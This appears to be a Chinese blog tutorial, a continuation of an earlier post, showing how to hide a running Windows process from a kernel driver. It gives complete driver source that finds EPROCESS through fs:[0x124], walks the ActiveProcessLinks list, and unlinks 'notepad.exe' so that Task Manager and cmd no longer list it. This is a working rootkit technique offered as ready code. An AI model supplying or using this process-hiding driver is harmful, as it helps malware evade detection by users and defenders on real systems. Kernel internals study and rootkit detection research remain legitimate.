截止到昨天那里我们的思路就清晰了,通过EPROCESS找到我们要隐藏的进程的ActiveProcessLinks,将双向链表的值修改,就可以将我们想要隐藏的这个进程的ActiveProcessLinks从双向链表中抹去的效果,这里的话如果在windbg里面直接使用ed修改的话是比较方便的,但是如果要使用代码来进行修改的话就需要首先定位到EPROCESS
在ETHREAD的0x220偏移得到ThreadsProcess,指向的是_EPROCESS这个结构体
那么就可以用汇编实现找到EPROCESS结构
__asm{mov eax, fs: [0x124] ;mov eax, [eax + 0x220];mov pEprocess, eax;}首先定义一个指针指向EPROCESS结构,并初始化指向ActiveProcessLinks的指针
pCurProcess = pEprocess;curNode = (PLIST_ENTRY)((ULONG)pCurProcess + 0x88);然后判断通过EPROCESS的0x174处的ImageFileName来判断进程名是不是我们想要隐藏的进程
ImageFileName = (PCHAR)pCurProcess + 0x174;if (strcmp(ImageFileName, "notepad.exe") == 0)如果是我们想要隐藏的进程就执行断链操作
curNode = (PLIST_ENTRY)((ULONG)pCurProcess + 0x88);nextNode = curNode->Flink;preNode = curNode->Blink;preNode->Flink = curNode->Flink;nextNode->Blink = curNode->Blink;如果不是我们想要的进程就继续往下取ActiveProcessLinks的值
pCurProcess = (PEPROCESS)(*(PULONG)((ULONG)pCurProcess + 0x88) - 0x88);完整代码如下
#include <ntddk.h>NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING reg_path);
VOID DriverUnload(PDRIVER_OBJECT driver);NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING reg_path)
{PEPROCESS pEprocess, pCurProcess;PCHAR ImageFileName;__asm{mov eax, fs: [0x124] ;mov eax, [eax + 0x220];mov pEprocess, eax;}pCurProcess = pEprocess;do{ImageFileName = (PCHAR)pCurProcess + 0x174;if (strcmp(ImageFileName, "notepad.exe") == 0){PLIST_ENTRY preNode, curNode, nextNode;curNode = (PLIST_ENTRY)((ULONG)pCurProcess + 0x88);nextNode = curNode->Flink;preNode = curNode->Blink;preNode->Flink = curNode->Flink;nextNode->Blink = curNode->Blink;DbgPrint("断链成功!\n");}pCurProcess = (PEPROCESS)(*(PULONG)((ULONG)pCurProcess + 0x88) - 0x88);} while (pEprocess != pCurProcess);driver->DriverUnload = DriverUnload;return STATUS_SUCCESS;
}VOID DriverUnload(PDRIVER_OBJECT driver)
{DbgPrint("驱动卸载成功\n");
}实现效果如下
安装驱动之后在任务管理器跟cmd里面都已经看不到notepad.exe这个进程
